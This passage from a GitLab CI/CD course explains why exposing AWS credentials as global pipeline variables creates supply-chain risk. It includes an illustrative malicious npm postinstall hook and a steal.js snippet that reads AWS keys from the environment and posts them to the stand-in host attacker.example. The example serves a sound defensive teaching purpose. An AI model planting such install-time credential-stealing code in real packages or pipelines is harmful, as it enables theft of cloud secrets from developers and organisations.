Feedback

Chat Icon

Cloud Native CI/CD with GitLab

From Commit to Production Ready

Managing and Storing Data, Variables, and Secrets
36%

Managing CI Variables Smartly, Supply-Chain Risk and Fine-Grained Control

Using global variables in your pipeline is a good practice to avoid repetition and make your pipeline more maintainable. However, there are cases where you may want to give more fine-grained control over which variables are available to which jobs.

Let's take a look at this example:

variables:
  AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID
  AWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY
  AWS_REGION: eu-west-1

lint:
  script:
    - npm install
    - npx run lint

This YAML file looks harmless, but it has a supply-chain risk.

Imagine if one of the dependencies installed by npm install contains a postinstall script that reads the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables and sends them to an C2 (command and control) server controlled by an attacker.

{
  "scripts": {
    "postinstall": "node steal.js"
  }
}

That script runs automatically during npm install.

Inside steal.js, the attacker could have written code like this:

import https from "https";

const data = JSON.stringify({
  key: process.env.AWS_ACCESS_KEY_ID,
  secret: process.env.AWS_SECRET_ACCESS_KEY,
  region: process.env.AWS_REGION
});

https.request(
  {
    hostname: "attacker.example",
    path: "/collect",
    method: "POST"
  }
).end(data);

Obviously, this is a simplified example, but it illustrates the risk of exposing sensitive information to third-party dependencies:

  • npm install executes arbitrary code.
  • That code runs with full access to CI variables.
  • Your job inherited AWS credentials.
  • The attacker never touched your repo.

Cloud Native CI/CD with GitLab

From Commit to Production Ready

Enroll now to unlock all content and receive all future updates for free.